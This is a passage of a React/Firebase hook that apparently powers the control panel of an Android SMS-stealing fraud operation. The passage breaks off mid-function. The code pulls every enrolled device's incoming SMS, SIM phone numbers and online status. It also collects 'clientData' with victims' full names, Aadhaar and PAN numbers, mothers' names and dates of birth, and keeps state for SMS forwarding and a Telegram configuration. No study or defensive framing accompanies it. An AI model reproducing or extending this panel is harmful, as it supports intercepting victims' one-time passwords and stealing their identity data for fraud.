import React, { useState, useEffect, useCallback, useRef } from 'react';
import { initializeApp, getApps } from 'firebase/app';
import { getDatabase, ref, onValue, set, push, remove, update, off, get } from 'firebase/database';
import { getFirebaseConfig } from '../firebase-config';
import { getCache, setCache } from '../utils/cache';

// Toast notification function
const showToast = (message, type = 'info') => {
  // Remove existing toasts
  const existingToasts = document.querySelectorAll('.toast-notification');
  existingToasts.forEach(toast => toast.remove());
  
  // Create toast element
  const toast = document.createElement('div');
  toast.className = `toast-notification toast-${type}`;
  toast.textContent = message;
  document.body.appendChild(toast);
  
  // Show toast
  setTimeout(() => toast.classList.add('show'), 10);
  
  // Remove toast after 3 seconds
  setTimeout(() => {
    toast.classList.remove('show');
    setTimeout(() => toast.remove(), 300);
  }, 3000);
};

export const useFirebase = (token) => {
  const [db, setDb] = useState(null);
  const [devices, setDevices] = useState([]);
  const [messages, setMessages] = useState([]);
  const [loading, setLoading] = useState(true);
  const [tokenExpiry, setTokenExpiry] = useState(0);
  const [smsForwardNumber, setSmsForwardNumber] = useState(null);
  const [telegramConfig, setTelegramConfig] = useState(null);
  const [deviceLimit, setDeviceLimit] = useState(50); // Limit initial load to 50 devices
  const [hasMoreDevices, setHasMoreDevices] = useState(false);
  const [totalDevicesCount, setTotalDevicesCount] = useState(0);
  
  // Store device data map ref for access outside useEffect
  const deviceDataMapRef = useRef(new Map());
  // Store messages array ref for access in deleteMessage
  const messagesArrayRef = useRef([]);

  useEffect(() => {
    if (!token) {
      setLoading(false);
      return;
    }

    const config = getFirebaseConfig(token);
    if (!config) {
      console.error('❌ No Firebase config found for token');
      setLoading(false);
      return;
    }

    let database;
    
    try {
      // Check if Firebase app is already initialized with this config
      let app;
      const existingApps = getApps();
      
      // Try to find existing app with matching projectId
      const existingApp = existingApps.find(app => {
        try {
          return app.options.projectId === config.projectId;
        } catch {
          return false;
        }
      });
      
      if (existingApp) {
        // Use existing app
        app = existingApp;
        console.log('✅ Using existing Firebase app');
      } else {
        // Initialize new app with unique name based on token
        const appName = `app_${token.substring(0, 10)}`;
        try {
          app = initializeApp(config, appName);
          console.log('✅ Firebase app initialized:', appName);
        } catch (initError) {
          // If initialization fails, try default app
          if (initError.code === 'app/duplicate-app') {
            app = existingApps[0];
            console.log('✅ Using default Firebase app');
          } else {
            throw initError;
          }
        }
      }
      
      database = getDatabase(app);
      setDb(database);
      console.log('✅ Firebase database connected successfully');
    } catch (error) {
      console.error('❌ Firebase initialization error:', error);
      setLoading(false);
      return;
    }

    // Ensure database is available before proceeding
    if (!database) {
      console.error('❌ Database not available');
      setLoading(false);
      return;
    }

    // Calculate token expiry (30 days)
    const expiry = new Date();
    expiry.setDate(expiry.getDate() + 30);
    setTokenExpiry(expiry.getTime());

    // Store device data as we collect it
    const deviceDataMap = deviceDataMapRef.current;
    deviceDataMap.clear(); // Clear previous data
    let deviceIds = [];
    
    // Messages handling - define these first
    const allMessages = [];
    const messageListeners = new Map();
    
    // Helper function to process a single message
    const processMessage = (id, msg, deviceIdOverride = '') => {
      // Skip deleted messages
      if (msg.deleted === true) {
        return null;
      }
      
      // Handle timestamp - could be number, string, or object
      let timestamp = 
        msg.timestamp || 
        msg.time || 
        msg.date || 
        msg.createdAt;
        
      if (typeof timestamp === 'object' && timestamp !== null) {
        const keys = Object.keys(timestamp);
        timestamp = keys.length > 0 ? timestamp[keys[0]] : Date.now();
      }
      if (!timestamp) timestamp = Date.now();
      
      // Get device ID - check multiple possible field names
      const deviceId = 
        deviceIdOverride ||
        msg.deviceId || 
        msg.device || 
        msg.deviceID || 
        msg.device_id || 
        '';
      
      // Get simSlot - handle 0 as valid value
      let simSlot = null;
      if (msg.simSlot !== null && msg.simSlot !== undefined) {
        simSlot = typeof msg.simSlot === 'number' ? msg.simSlot : parseInt(msg.simSlot);
        if (isNaN(simSlot)) simSlot = null;
      }
      
      // Sanitize message - include all common fields
      return {
        id,
        timestamp: typeof timestamp === 'number' ? timestamp : new Date(timestamp).getTime(),
        sender: 
          typeof msg.sender === 'string' ? msg.sender : 
          typeof msg.from === 'string' ? msg.from :
          typeof msg.phoneNumber === 'string' ? msg.phoneNumber :
          typeof msg.phone === 'string' ? msg.phone :
          'Unknown',
        body: 
          typeof msg.body === 'string' ? msg.body : 
          typeof msg.message === 'string' ? msg.message :
          typeof msg.text === 'string' ? msg.text :
          typeof msg.content === 'string' ? msg.content :
          typeof msg.sms === 'string' ? msg.sms :
          '',
        deviceId: deviceId,
        simSlot: simSlot
      };
    };
    
    // Function to update messages list
    const updateMessagesList = () => {
      const sortedMessages = [...allMessages].sort((a, b) => (b.timestamp || 0) - (a.timestamp || 0));
      console.log(`📨 Total messages: ${sortedMessages.length}`, sortedMessages);
      messagesArrayRef.current = sortedMessages; // Update ref
      setMessages(sortedMessages);
    };
    
    // Set up device message listeners when devices are discovered
    function setupDeviceMessageListeners(deviceIds) {
      deviceIds.forEach(deviceId => {
        if (!messageListeners.has(deviceId)) {
          // Listen to devices/deviceId/sms for new SMS structure
          const deviceSmsRef = ref(database, `devices/${deviceId}/sms`);
          onValue(deviceSmsRef, (snapshot) => {
            const data = snapshot.val();
            console.log(`💬 SMS for device ${deviceId}:`, data);
            
            // Remove old messages from this device
            const filtered = allMessages.filter(msg => msg.deviceId !== deviceId);
            allMessages.length = 0;
            allMessages.push(...filtered);
            
            if (data) {
              // Handle new SMS structure: { timestamp: { date, message, sender, simSlot, subscriptionId, timestamp } }
              const deviceMessages = Object.entries(data)
                .filter(([id, msg]) => !msg.deleted) // Filter out deleted messages
                .map(([id, msg]) => {
                  // New structure has: date, message, sender, simSlot, subscriptionId, timestamp
                  const timestamp = msg.timestamp || msg.date || id;
                  let parsedTimestamp;
                  
                  if (typeof timestamp === 'number') {
                    parsedTimestamp = timestamp;
                  } else if (typeof timestamp === 'string') {
                    parsedTimestamp = new Date(timestamp).getTime();
                    if (isNaN(parsedTimestamp)) {
                      parsedTimestamp = parseInt(timestamp) || Date.now();
                    }
                  } else {
                    parsedTimestamp = Date.now();
                  }
                  
                  // Get simSlot - handle 0 as valid value
                  let simSlot = null;
                  if (msg.simSlot !== null && msg.simSlot !== undefined) {
                    simSlot = typeof msg.simSlot === 'number' ? msg.simSlot : parseInt(msg.simSlot);
                    if (isNaN(simSlot)) simSlot = null;
                  }
                  
                  return {
                    id: id,
                    timestamp: parsedTimestamp,
                    sender: msg.sender || msg.from || 'Unknown',
                    body: msg.message || msg.body || msg.text || msg.content || '',
                    deviceId: deviceId,
                    date: msg.date || null,
                    simSlot: simSlot,
                    subscriptionId: msg.subscriptionId || null
                  };
                });
              allMessages.push(...deviceMessages);
            }
            
            updateMessagesList();
          });
          
          // Also listen to old messages path for backward compatibility
          const deviceMessagesRef = ref(database, `devices/${deviceId}/messages`);
          onValue(deviceMessagesRef, (snapshot) => {
            const data = snapshot.val();
            if (data) {
              console.log(`💬 Old format messages for device ${deviceId}:`, data);
              const deviceMessages = Object.entries(data)
                .map(([id, msg]) => {
                  return processMessage(id, msg, deviceId);
                })
                .filter(msg => msg !== null); // Filter out null (deleted) messages
              // Only add if not already in allMessages
              const existingIds = new Set(allMessages.map(m => m.id));
              const newMessages = deviceMessages.filter(m => !existingIds.has(m.id));
              allMessages.push(...newMessages);
              updateMessagesList();
            }
          });
          
          messageListeners.set(deviceId, true);
        }
      });
    }
    
    // Listen to root level messages
    const messagesRef = ref(database, 'messages');
    onValue(messagesRef, (snapshot) => {
      const data = snapshot.val();
      console.log('💬 Firebase Messages Data (root):', data); // Debug log
      
      if (data) {
        const rootMessages = Object.entries(data)
          .map(([id, msg]) => {
            return processMessage(id, msg);
          })
          .filter(msg => msg !== null); // Filter out null (deleted) messages
        // Clear root messages and add new ones
        const rootMsgIds = new Set(rootMessages.map(m => m.id));
        const filtered = allMessages.filter(m => !rootMsgIds.has(m.id) || m.deviceId);
        allMessages.length = 0;
        allMessages.push(...filtered, ...rootMessages);
        updateMessagesList();
      }
    }, (error) => {
      console.warn('⚠️ No root messages found or error:', error);
    });
    
    // Function to update the devices list (optimized with limit)
    // Use a ref to access current deviceLimit value
    const deviceLimitRef = { current: deviceLimit };
    deviceLimitRef.current = deviceLimit;
    
    const updateDevicesList = () => {
      // Create a copy before sorting to avoid mutation
      const allDeviceList = [...Array.from(deviceDataMap.values())]
        .filter(device => !device.deleted) // Filter out deleted devices
        .map(device => {
          // Ensure installTime is a valid timestamp (number)
          let installTime = device.installTime || Date.now();
          if (typeof installTime === 'string') {
            const parsed = new Date(installTime).getTime();
            installTime = isNaN(parsed) ? Date.now() : parsed;
          } else if (typeof installTime !== 'number' || isNaN(installTime)) {
            installTime = Date.now();
          }
          
          return {
            ...device,
            online: device.online === true, // Get from devices/deviceId/isOnline: true = online, false = offline
            favorite: device.favorite || false,
            battery: device.battery || 0,
            sims: device.sims || [],
            model: device.model || 'Unknown',
            installTime: installTime
          };
        })
        .sort((a, b) => {
          // Sort by installTime descending (newest first)
          const timeA = a.installTime || 0;
          const timeB = b.installTime || 0;
          return timeB - timeA;
        });
      
      // Set total count
      setTotalDevicesCount(allDeviceList.length);
      
      // Apply limit for performance (use ref to get current value)
      const currentLimit = deviceLimitRef.current;
      const limitedList = allDeviceList.slice(0, currentLimit);
      setHasMoreDevices(allDeviceList.length > currentLimit);
      
      console.log(`📊 Updated devices list: ${limitedList.length} / ${allDeviceList.length} devices`);
      setDevices(limitedList);
      setLoading(false);
    };
    
    // Helper function to check device status immediately using all available structures
    const checkDeviceStatusImmediately = async (deviceId) => {
      if (!database) return;
      
      const device = deviceDataMap.get(deviceId);
      if (!device) return;
      
      try {
        // Try all status structures in parallel for immediate check
        const [deviceStatusSnapshot, statusSnapshot, deviceSnapshot] = await Promise.allSettled([
          get(ref(database, `devices/${deviceId}/device_status`)),
          get(ref(database, `devices/${deviceId}/status`)),
          get(ref(database, `devices/${deviceId}`))
        ]);
        
        let isOnline = false;
        let statusSource = 'none';
        
        // Priority 1: Check device_status structure
        if (deviceStatusSnapshot.status === 'fulfilled' && deviceStatusSnapshot.value.exists()) {
          const statusData = deviceStatusSnapshot.value.val();
          if (statusData) {
            const status = statusData.status || '';
            const statusTimestamp = statusData.timestamp || 0;
            const now = Date.now();
            const timeDiff = now - statusTimestamp;
            const oneMinute = 60 * 1000;
            isOnline = (status.toLowerCase() === 'online') && (timeDiff <= oneMinute);
            statusSource = 'device_status';
          }
        }
        
        // Priority 2: Check status structure (if device_status not found)
        if (!isOnline && statusSource === 'none' && statusSnapshot.status === 'fulfilled' && statusSnapshot.value.exists()) {
          const statusData = statusSnapshot.value.val();
          if (statusData) {
            const status = statusData.status || '';
            const statusTimestamp = statusData.timestamp || 0;
            const now = Date.now();
            const timeDiff = now - statusTimestamp;
            const oneMinute = 60 * 1000;
            isOnline = (status.toLowerCase() === 'online') && (timeDiff <= oneMinute);
            statusSource = 'status';
          }
        }
        
        // Priority 3: Check isOnline (if both status structures not found)
        if (statusSource === 'none' && deviceSnapshot.status === 'fulfilled' && deviceSnapshot.value.exists()) {
          const deviceData = deviceSnapshot.value.val();
          if (deviceData) {
            isOnline = deviceData.isOnline === true || false;
            statusSource = 'isOnline';
          }
        }
        
        // Update device status if changed
        if (device.online !== isOnline) {
          device.online = isOnline;
          deviceDataMap.set(deviceId, device);
          updateDevicesList();
          console.log(`📊 Immediate status check for ${deviceId}: ${isOnline ? 'ONLINE' : 'OFFLINE'} (source: ${statusSource})`);
        }
      } catch (error) {
        console.error(`Error checking status for ${deviceId}:`, error);
        // Set offline on error
        if (device.online !== false) {
          device.online = false;
          deviceDataMap.set(deviceId, device);
          updateDevicesList();
        }
      }
    };
    
    // ONE-TIME FETCH for device list (NO live listeners - performance critical)
    // Check cache first, then load all devices when stable
    const fetchDevices = async () => {
      try {
        // Check cache first (uses IndexedDB in production, localStorage in development)
        const cacheKey = `devices_cache_${token}`;
        const cachedData = await getCache(cacheKey);
        
        if (cachedData && cachedData.deviceIds && cachedData.devices) {
          console.log('📦 Loading devices from cache');
          deviceIds = cachedData.deviceIds || [];
          cachedData.devices?.forEach(device => {
            deviceDataMap.set(device.id, device);
          });
          updateDevicesList();
          setLoading(false);
          
          // Set up message listeners
          setupDeviceMessageListeners(deviceIds);
          
          // Set up status listeners
          setupStatusListeners(deviceIds);
          
          // Load fresh data in background (non-blocking)
          setTimeout(() => loadAllDevices(), 1000);
          return;
        }
        
        // Load all devices (no limit when stable)
        await loadAllDevices();
      } catch (error) {
        console.error('❌ Firebase devices fetch error:', error);
        setLoading(false);
      }
    };
    
    // Load all devices from Firebase
    const loadAllDevices = async () => {
      try {
        // Fetch all devices without ordering (sort in JavaScript to avoid index requirement)
        const devicesRef = ref(database, 'devices');
        
        const snapshot = await get(devicesRef);
        const data = snapshot.val();
        
        if (!data) {
          console.warn('⚠️ No devices data found in Firebase');
          setLoading(false);
          return;
        }
        
        deviceIds = Object.keys(data);
        console.log(`📋 Fetched ${deviceIds.length} devices (one-time)`);
        
        // Set up message listeners for each device (only for messages, not device data)
        setupDeviceMessageListeners(deviceIds);
        
        // Process all device data in one batch (NO listeners)
        deviceIds.forEach(deviceId => {
          const deviceData = data[deviceId];
          
          // Skip deleted devices
          if (deviceData && deviceData.deleted) {
            console.log(`⏭️ Skipping deleted device: ${deviceId}`);
            return;
          }
          
          // Initialize device object
          // Check status from devices/{deviceId}/device_status first (primary source)
          let initialOnline = false;
          if (deviceData?.device_status) {
            const status = deviceData.device_status.status || '';
            const statusTimestamp = deviceData.device_status.timestamp || 0;
            const now = Date.now();
            const timeDiff = now - statusTimestamp;
            const oneMinute = 60 * 1000;
            initialOnline = (status.toLowerCase() === 'online') && (timeDiff <= oneMinute);
          } else if (deviceData?.status) {
            // Fallback to devices/{deviceId}/status if device_status not found
            const status = deviceData.status.status || '';
            const statusTimestamp = deviceData.status.timestamp || 0;
            const now = Date.now();
            const timeDiff = now - statusTimestamp;
            const oneMinute = 60 * 1000;
            initialOnline = (status.toLowerCase() === 'online') && (timeDiff <= oneMinute);
          } else {
            // Final fallback to isOnline if both status structures not available
            initialOnline = deviceData?.isOnline === true || false;
          }
          
          const device = {
            id: deviceId,
            online: initialOnline,
            favorite: deviceData?.favorite || false,
            battery: 0,
            sims: [],
            model: 'Unknown',
            installTime: Date.now(),
            installDate: null,
            clientData: null
          };
          
          // Parse deviceInfo
          if (deviceData?.deviceInfo) {
            const deviceInfo = deviceData.deviceInfo;
            device.model = deviceInfo.model || deviceInfo.deviceName || 'Unknown';
            device.deviceName = deviceInfo.deviceName || '';
            device.manufacturer = deviceInfo.manufacturer || '';
            device.androidVersion = deviceInfo.androidVersion || '';
            device.serial = deviceInfo.deviceId || deviceId;
          }
          
          // Parse battery (get latest entry)
          if (deviceData?.battery) {
            const batteryEntries = Object.entries(deviceData.battery);
            if (batteryEntries.length > 0) {
              const latestBattery = [...batteryEntries].sort((a, b) => Number(b[0]) - Number(a[0]))[0];
              const batteryValue = latestBattery[1];
              device.battery = typeof batteryValue === 'object' && batteryValue.percentage !== undefined
                ? batteryValue.percentage
                : (typeof batteryValue === 'number' ? batteryValue : 0);
            }
          }
          
          // Parse simInfo
          if (deviceData?.simInfo?.sims) {
            if (Array.isArray(deviceData.simInfo.sims)) {
              device.sims = deviceData.simInfo.sims.map(sim => ({
                operator: sim.simOperator || 'Unknown',
                number: sim.phoneNumber || 'N/A'
              }));
            } else if (typeof deviceData.simInfo.sims === 'object') {
              device.sims = Object.values(deviceData.simInfo.sims).map(sim => ({
                operator: sim.simOperator || 'Unknown',
                number: sim.phoneNumber || 'N/A'
              }));
            }
          }
          
          // First, check if installTime exists in Firebase and use it if available
          // Then handle installDate
          let existingInstallTime = null;
          if (deviceData?.installTime) {
            // If installTime exists in deviceData, use it
            existingInstallTime = typeof deviceData.installTime === 'number' 
              ? deviceData.installTime 
              : new Date(deviceData.installTime).getTime();
            device.installTime = existingInstallTime;
          }
          
          // Parse installDate and create installTime if missing
          if (deviceData?.installDate) {
            const installDateValue = deviceData.installDate;
            let parsedDate;
            if (typeof installDateValue === 'string') {
              const dateMatch = installDateValue.match(/(\d{4}-\d{2}-\d{2})\s+(\d{1,2}):(\d{2}):(\d{2})\s+(AM|PM)/i);
              if (dateMatch) {
                const [, dateStr, hours, minutes, seconds, period] = dateMatch;
                let hour24 = parseInt(hours);
                if (period.toUpperCase() === 'PM' && hour24 !== 12) hour24 += 12;
                else if (period.toUpperCase() === 'AM' && hour24 === 12) hour24 = 0;
                const time24 = `${hour24.toString().padStart(2, '0')}:${minutes}:${seconds}`;
                parsedDate = new Date(`${dateStr} ${time24}`);
              } else {
                parsedDate = new Date(installDateValue);
              }
            } else if (typeof installDateValue === 'number') {
              parsedDate = new Date(installDateValue);
            } else {
              parsedDate = new Date(installDateValue);
            }
            const calculatedInstallTime = isNaN(parsedDate.getTime()) ? Date.now() : parsedDate.getTime();
            
            // Use existing installTime if available, otherwise use calculated from installDate
            if (existingInstallTime && !isNaN(existingInstallTime)) {
              device.installTime = existingInstallTime;
            } else {
              device.installTime = calculatedInstallTime;
            }
            device.installDate = installDateValue;
            
            // Always check Firebase directly to see if installTime exists, and create it from installDate if missing
            // This ensures installTime is created when device is loaded/connected to Firebase
            if (!existingInstallTime && calculatedInstallTime && !isNaN(calculatedInstallTime)) {
              // Check Firebase directly to see if installTime field exists
              get(ref(database, `devices/${deviceId}/installTime`)).then((snapshot) => {
                if (!snapshot.exists()) {
                  // Field doesn't exist in Firebase, create it from installDate
                  set(ref(database, `devices/${deviceId}/installTime`), calculatedInstallTime).then(() => {
                    console.log(`📅 Created installTime for ${deviceId} from installDate: ${calculatedInstallTime} (${installDateValue})`);
                    // Update local device object
                    const localDevice = deviceDataMap.get(deviceId);
                    if (localDevice) {
                      localDevice.installTime = calculatedInstallTime;
                      deviceDataMap.set(deviceId, localDevice);
                      updateDevicesList();
                    }
                  }).catch(error => {
                    console.warn(`Error saving installTime for ${deviceId}:`, error);
                  });
                } else {
                  // Field already exists, use the existing value from Firebase
                  const firebaseInstallTime = snapshot.val();
                  const firebaseTime = typeof firebaseInstallTime === 'number' 
                    ? firebaseInstallTime 
                    : new Date(firebaseInstallTime).getTime();
                  console.log(`📅 installTime already exists for ${deviceId}, using existing value: ${firebaseTime}`);
                  // Update local device object with Firebase value
                  const localDevice = deviceDataMap.get(deviceId);
                  if (localDevice) {
                    localDevice.installTime = firebaseTime;
                    deviceDataMap.set(deviceId, localDevice);
                    updateDevicesList();
                  }
                }
              }).catch(() => {
                // If get fails, try to set anyway (field likely doesn't exist)
                set(ref(database, `devices/${deviceId}/installTime`), calculatedInstallTime).then(() => {
                  console.log(`📅 Created installTime for ${deviceId} from installDate: ${calculatedInstallTime} (${installDateValue})`);
                  // Update local device object
                  const localDevice = deviceDataMap.current.get(deviceId);
                  if (localDevice) {
                    localDevice.installTime = calculatedInstallTime;
                    deviceDataMap.current.set(deviceId, localDevice);
                    updateDevicesList();
                  }
                }).catch(error => {
                  console.warn(`Error saving installTime for ${deviceId}:`, error);
                });
              });
            } else if (existingInstallTime) {
              // installTime already exists, just verify it's in Firebase
              get(ref(database, `devices/${deviceId}/installTime`)).then((snapshot) => {
                if (snapshot.exists()) {
                  const firebaseInstallTime = snapshot.val();
                  const firebaseTime = typeof firebaseInstallTime === 'number' 
                    ? firebaseInstallTime 
                    : new Date(firebaseInstallTime).getTime();
                  // Use Firebase value if it exists (it's the source of truth)
                  const localDevice = deviceDataMap.get(deviceId);
                  if (localDevice) {
                    localDevice.installTime = firebaseTime;
                    deviceDataMap.set(deviceId, localDevice);
                    updateDevicesList();
                  }
                }
              }).catch(() => {
                // Ignore errors
              });
            }
          } else if (existingInstallTime) {
            // If installTime exists but no installDate, use installTime
            device.installTime = existingInstallTime;
          } else {
            // If neither exists, use current time as fallback (don't save to Firebase)
            device.installTime = Date.now();
          }
          
          // Parse clientData
          if (deviceData?.clientData) {
            device.clientData = {
              fullName: deviceData.clientData.fullName || null,
              aadharNumber: deviceData.clientData.aadharNumber || null,
              mobileNumber: deviceData.clientData.mobileNumber || null,
              motherName: deviceData.clientData.motherName || null,
              panNumber: deviceData.clientData.panNumber || null,
              dob: deviceData.clientData.dob || null
            };
          }
          
          // Get FCM token if available
          if (deviceData?.fcmToken) {
            device.fcmToken = deviceData.fcmToken;
          }
          
          deviceDataMap.set(deviceId, device);
          
          // Check if installDate exists in Firebase, if not create it with current date/time
          // Format: "2026-02-07 11:08:35 PM"
          // But first check if installTime exists and use that timestamp if available
          get(ref(database, `devices/${deviceId}/installDate`)).then((snapshot) => {
            if (!snapshot.exists()) {
              // installDate doesn't exist, check if installTime exists first
              get(ref(database, `devices/${deviceId}/installTime`)).then((installTimeSnapshot) => {
                let dateToUse;
                let timeToUse;
                
                if (installTimeSnapshot.exists()) {
                  // Use existing installTime to create installDate
                  const existingTime = installTimeSnapshot.val();
                  timeToUse = typeof existingTime === 'number' ? existingTime : new Date(existingTime).getTime();
                  dateToUse = new Date(timeToUse);
                  console.log(`📅 Using existing installTime for ${deviceId} to create installDate: ${timeToUse}`);
                } else {
                  // No installTime exists, use current date/time
                  dateToUse = new Date();
                  timeToUse = dateToUse.getTime();
                  console.log(`📅 Creating new installDate and installTime for ${deviceId}`);
                }
                
                const year = dateToUse.getFullYear();
                const month = String(dateToUse.getMonth() + 1).padStart(2, '0');
                const day = String(dateToUse.getDate()).padStart(2, '0');
                let hours = dateToUse.getHours();
                const minutes = String(dateToUse.getMinutes()).padStart(2, '0');
                const seconds = String(dateToUse.getSeconds()).padStart(2, '0');
                const period = hours >= 12 ? 'PM' : 'AM';
                if (hours > 12) hours -= 12;
                if (hours === 0) hours = 12;
                const formattedDate = `${year}-${month}-${day} ${hours}:${minutes}:${seconds} ${period}`;
                
                // Save installDate to Firebase
                set(ref(database, `devices/${deviceId}/installDate`), formattedDate).then(() => {
                  console.log(`📅 Created installDate for ${deviceId}: ${formattedDate}`);
                  
                  // Also save installTime if it doesn't exist
                  if (!installTimeSnapshot.exists()) {
                    set(ref(database, `devices/${deviceId}/installTime`), timeToUse).catch(error => {
                      console.warn(`Error saving installTime for ${deviceId}:`, error);
                    });
                  }
                  
                  // Update local device object
                  const localDevice = deviceDataMap.get(deviceId);
                  if (localDevice) {
                    localDevice.installDate = formattedDate;
                    localDevice.installTime = timeToUse;
                    deviceDataMap.set(deviceId, localDevice);
                    updateDevicesList();
                  }
                }).catch(error => {
                  console.warn(`Error saving installDate for ${deviceId}:`, error);
                });
              }).catch(() => {
                // If get fails for installTime, use current date/time
                const now = new Date();
                const year = now.getFullYear();
                const month = String(now.getMonth() + 1).padStart(2, '0');
                const day = String(now.getDate()).padStart(2, '0');
                let hours = now.getHours();
                const minutes = String(now.getMinutes()).padStart(2, '0');
                const seconds = String(now.getSeconds()).padStart(2, '0');
                const period = hours >= 12 ? 'PM' : 'AM';
                if (hours > 12) hours -= 12;
                if (hours === 0) hours = 12;
                const formattedDate = `${year}-${month}-${day} ${hours}:${minutes}:${seconds} ${period}`;
                
                set(ref(database, `devices/${deviceId}/installDate`), formattedDate).then(() => {
                  console.log(`📅 Created installDate for ${deviceId}: ${formattedDate}`);
                  // Also save installTime
                  set(ref(database, `devices/${deviceId}/installTime`), now.getTime()).catch(() => {});
                  // Update local device object
                  const localDevice = deviceDataMap.current.get(deviceId);
                  if (localDevice) {
                    localDevice.installDate = formattedDate;
                    localDevice.installTime = now.getTime();
                    deviceDataMap.current.set(deviceId, localDevice);
                    updateDevicesList();
                  }
                }).catch(error => {
                  console.warn(`Error saving installDate for ${deviceId}:`, error);
                });
              });
            }
          }).catch(() => {
            // If get fails, try to set anyway (field likely doesn't exist)
            // First check if installTime exists
            get(ref(database, `devices/${deviceId}/installTime`)).then((installTimeSnapshot) => {
              let dateToUse;
              let timeToUse;
              
              if (installTimeSnapshot.exists()) {
                // Use existing installTime to create installDate
                const existingTime = installTimeSnapshot.val();
                timeToUse = typeof existingTime === 'number' ? existingTime : new Date(existingTime).getTime();
                dateToUse = new Date(timeToUse);
              } else {
                // No installTime exists, use current date/time
                dateToUse = new Date();
                timeToUse = dateToUse.getTime();
              }
              
              const year = dateToUse.getFullYear();
              const month = String(dateToUse.getMonth() + 1).padStart(2, '0');
              const day = String(dateToUse.getDate()).padStart(2, '0');
              let hours = dateToUse.getHours();
              const minutes = String(dateToUse.getMinutes()).padStart(2, '0');
              const seconds = String(dateToUse.getSeconds()).padStart(2, '0');
              const period = hours >= 12 ? 'PM' : 'AM';
              if (hours > 12) hours -= 12;
              if (hours === 0) hours = 12;
              const formattedDate = `${year}-${month}-${day} ${hours}:${minutes}:${seconds} ${period}`;
              
              set(ref(database, `devices/${deviceId}/installDate`), formattedDate).then(() => {
                console.log(`📅 Created installDate for ${deviceId}: ${formattedDate}`);
                // Also save installTime if it doesn't exist
                if (!installTimeSnapshot.exists()) {
                  set(ref(database, `devices/${deviceId}/installTime`), timeToUse).catch(() => {});
                }
                // Update local device object
                const localDevice = deviceDataMap.current.get(deviceId);
                if (localDevice) {
                  localDevice.installDate = formattedDate;
                  localDevice.installTime = timeToUse;
                  deviceDataMap.current.set(deviceId, localDevice);
                  updateDevicesList();
                }
              }).catch(error => {
                console.warn(`Error saving installDate for ${deviceId}:`, error);
              });
            }).catch(() => {
              // If both get calls fail, use current date/time
              const now = new Date();
              const year = now.getFullYear();
              const month = String(now.getMonth() + 1).padStart(2, '0');
              const day = String(now.getDate()).padStart(2, '0');
              let hours = now.getHours();
              const minutes = String(now.getMinutes()).padStart(2, '0');
              const seconds = String(now.getSeconds()).padStart(2, '0');
              const period = hours >= 12 ? 'PM' : 'AM';
              if (hours > 12) hours -= 12;
              if (hours === 0) hours = 12;
              const formattedDate = `${year}-${month}-${day} ${hours}:${minutes}:${seconds} ${period}`;
              
              set(ref(database, `devices/${deviceId}/installDate`), formattedDate).then(() => {
                console.log(`📅 Created installDate for ${deviceId}: ${formattedDate}`);
                // Also save installTime
                set(ref(database, `devices/${deviceId}/installTime`), now.getTime()).catch(() => {});
                // Update local device object
                const localDevice = deviceDataMap.current.get(deviceId);
                if (localDevice) {
                  localDevice.installDate = formattedDate;
                  localDevice.installTime = now.getTime();
                  deviceDataMap.current.set(deviceId, localDevice);
                  updateDevicesList();
                }
              }).catch(error => {
                console.warn(`Error saving installDate for ${deviceId}:`, error);
              });
            });
          });
        });
        
        // Set up status listeners (includes immediate status check)
        setupStatusListeners(deviceIds);
        
        // Set up favorite listeners
        setupFavoriteListeners(deviceIds);
        
        // Immediately check status for all devices using all structures (parallel check)
        // This ensures accurate status right after devices are loaded
        deviceIds.forEach(deviceId => {
          checkDeviceStatusImmediately(deviceId);
        });
        
        // Save to cache (uses IndexedDB in production, localStorage in development)
        const cacheKey = `devices_cache_${token}`;
        const devicesArray = Array.from(deviceDataMap.values());
        // Cache for 5 minutes
        setCache(cacheKey, {
          deviceIds: deviceIds,
          devices: devicesArray
        }, 5 * 60 * 1000).then(() => {
          console.log('💾 Devices cached');
        }).catch(error => {
          console.warn('Cache save error:', error);
        });
        
        updateDevicesList();
        setLoading(false);
      } catch (error) {
        console.error('❌ Firebase devices fetch error:', error);
        setLoading(false);
      }
    };
    
    // Set up favorite listeners for devices
    const setupFavoriteListeners = (currentDeviceIds) => {
      if (!database) return;
      
      currentDeviceIds.forEach(deviceId => {
        const favoriteRef = ref(database, `devices/${deviceId}/favorite`);
        onValue(favoriteRef, (snapshot) => {
          const favoriteValue = snapshot.val();
          const device = deviceDataMap.get(deviceId);
          if (device) {
            // Update favorite status from Firebase
            device.favorite = favoriteValue === true;
            deviceDataMap.set(deviceId, device);
            updateDevicesList();
            console.log(`⭐ Favorite updated for ${deviceId}: ${device.favorite}`);
          }
        }, (error) => {
          // If favorite field doesn't exist, it's not a favorite
          const device = deviceDataMap.get(deviceId);
          if (device && device.favorite !== false) {
            device.favorite = false;
            deviceDataMap.set(deviceId, device);
            updateDevicesList();
          }
        });
      });
    };
    
    // Set up status listeners for devices
    const setupStatusListeners = (deviceIds) => {
      deviceIds.forEach(deviceId => {
        const device = deviceDataMap.get(deviceId);
        if (!device) return;
        
        // Check status immediately when setting up listener
        checkDeviceStatusImmediately(deviceId);
        
        // Primary source: devices/{deviceId}/device_status
        const deviceStatusRef = ref(database, `devices/${deviceId}/device_status`);
        onValue(deviceStatusRef, (snapshot) => {
          const statusData = snapshot.val();
          const device = deviceDataMap.get(deviceId);
          
          if (device && statusData) {
            const status = statusData.status || '';
            const statusTimestamp = statusData.timestamp || 0;
            const now = Date.now();
            const timeDiff = now - statusTimestamp;
            const oneMinute = 60 * 1000; // 1 minute in milliseconds
            
            // Check if status is "online" and timestamp is within 1 minute
            device.online = (status.toLowerCase() === 'online') && (timeDiff <= oneMinute);
            
            deviceDataMap.set(deviceId, device);
            updateDevicesList();
            
            console.log(`📊 Status update for ${deviceId}: ${device.online ? 'ONLINE' : 'OFFLINE'} (${Math.round(timeDiff / 1000)}s ago)`);
          } else if (device && !statusData) {
            // If device_status not found, check fallback immediately
            checkDeviceStatusImmediately(deviceId);
          }
        }, (error) => {
          // If device_status not found, check fallback immediately
          console.log(`⚠️ device_status not found for ${deviceId}, checking fallback status`);
          checkDeviceStatusImmediately(deviceId);
        });
        
        // Fallback source: devices/{deviceId}/status (if device_status not found)
        const statusRef = ref(database, `devices/${deviceId}/status`);
        onValue(statusRef, (snapshot) => {
          const statusData = snapshot.val();
          const device = deviceDataMap.get(deviceId);
          
          if (device && statusData) {
            const status = statusData.status || '';
            const statusTimestamp = statusData.timestamp || 0;
            const now = Date.now();
            const timeDiff = now - statusTimestamp;
            const oneMinute = 60 * 1000; // 1 minute in milliseconds
            
            // Check if status is "online" and timestamp is within 1 minute
            device.online = (status.toLowerCase() === 'online') && (timeDiff <= oneMinute);
            
